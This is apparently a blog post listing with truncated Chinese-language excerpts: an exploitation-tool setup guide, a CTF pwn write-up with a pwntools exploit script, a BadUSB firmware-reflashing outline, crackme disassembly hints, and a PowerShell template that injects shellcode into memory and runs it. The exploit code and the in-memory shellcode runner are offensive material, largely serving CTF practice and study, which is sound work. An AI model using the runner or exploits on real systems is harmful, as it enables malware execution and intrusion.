Posts

ub 14.04 x64 i32 lib apt-get install gcc-multilib cd /etc/apt/sources.list.d echo "deb http://old-releases.ubuntu.com/ubuntu/ raring main restricted universe multiverse" >ia32-libs-raring.list apt-get update apt-get install ia32-libs dpkg --add-architecture i386 apt-get update apt-get install libssl-dev:i386 PEDA apt-get install nasm micro-inetd apt-get install libc6-dbg https://github.com/longld/peda qira https://github.com/BinaryAnalysisPlatform/qira pwntools 包含checksec, ROPgadget Tools sudo pip install git+https://github.com/Gallopsled/pwntools#egg=pwntools fix bug cp /usr/local/lib/python2.7/dist-packages/usr/lib/python2.7/dist-packages/capstone/libcapstone.so /usr/local/lib/python2.7/dist-packages/capstone/. rp++ https://github.com/0vercl0k/rp/downloads ncat sudo apt-get install netcat-traditional netcat-openbsd nmap

簡單紀錄一下 PWN1 丟進ida 可以看到 if ( v4 == 0x90909090 ) result = puts(aCensordCensord); else result = printf("Your point is only %d, try hard!\n", v4, v1, v2, v3); return result; 直接塞90結束 python -c 'print "\x90"*1000' | nc 52.69.163.194 1111 PWN2 定位到地20個字以後可以控制eip gdb-peda$ info functions All defined functions: Non-debugging symbols: 0x08048364 _init 0x080483a0 read@plt 可以指到read上,一般來說長這樣 call ret argv1 argv2 argv3 可以控制read的返回地址跟參數,所以可以把ret跟我們shellcode 指到同一個位置上,shellcode的話隨便找一段空⽩白的地⽅方寫上去就好 from pwn import * import time r = remote('127.0.0.1', 4000) read_adr = "\xa0\x83\x04\x08" read = "\x00\x00\x00\x00" + "\x00\xa1\x04\x08" + "\x00\x01\x00\x00" p = "a"*20 + read_adr + "\x00\xa1\x04\x08" + read r....

https://slides.com/zettain/bad-usb https://github.com/adamcaudill/Psychson 支援設備 Patriot 8GB Supersonic Xpress* Kingston DataTraveler 3.0 T111 8GB Silicon power marvel M60 64GB Patriot Stellar 64 Gb Phison Toshiba TransMemory-MX USB 3.0 16GB Toshiba TransMemory-MX USB 3.0 8GB Kingston DataTraveler G4 64 GB Patriot PSF16GXPUSB Supersonic Xpress 16GB Silicon Power 32GB Blaze B30 (SP032GBUF3B30V1K) Kingston Digital 8GB USB 3.0 DataTraveler 取得晶片 型號 下載 Firmware 與 燒錄檔案 Firmware PS2251-03 flash chip http://www.usbdev.ru/?wpfb_dl=777 編譯環境 Visual Studio 2012 SDCC (Small Device C Compiler 安裝路徑 C:\Program Files\SDCC 可以先編譯 DriveCom 和 Injector...

app1 Hint:HEX app2 Hint:HEX app4 Hint:VB反編譯，OD修改 Hint:OD窗口插件 app5 Hint:觀察ebp附近也存在答案 0040109C 8B4D E0 mov ecx,dword ptr ss:[ebp-20] ; 算法開始 0040109F 83C1 04 add ecx,4 004010A2 894D E0 mov dword ptr ss:[ebp-20],ecx 004010A5 8B55 DC mov edx,dword ptr ss:[ebp-24] 004010A8 83EA 01 sub edx,1 004010AB 8955 DC mov dword ptr ss:[ebp-24],edx 004010AE 837D E0 0D cmp dword ptr ss:[ebp-20],0D 004010B2 73 28 jnb short app5win.004010DC 004010B4 8B45 E0 mov eax,dword ptr ss:[ebp-20] 004010B7 C1E8 02 shr eax,2 004010BA 8B4D F8 mov ecx,dword ptr ss:[ebp-8] 004010BD 8B55 DC mov edx,dword ptr ss:[ebp-24] 004010C0 8B0481 mov eax,dword ptr ds:[ecx+eax*4] 004010C3 3B4495 E8 cmp eax,dword ptr ss:[ebp+edx*4-18] ; 比較ascii,注意堆棧 004010C7 74 11 je short app5win....

執行shellcode的模板 $code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$sc64 = SHELLCOD;[Byte[]]$sc = $sc64;$size = 0x1000;if ($sc.Length -gt 0x1000) {$size = $sc.Length};$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)};$winFunc::CreateThread(0,0,$x,0,0,0);for (;;) { Start-sleep 60 }; SHELLCOD的地方是要替換的...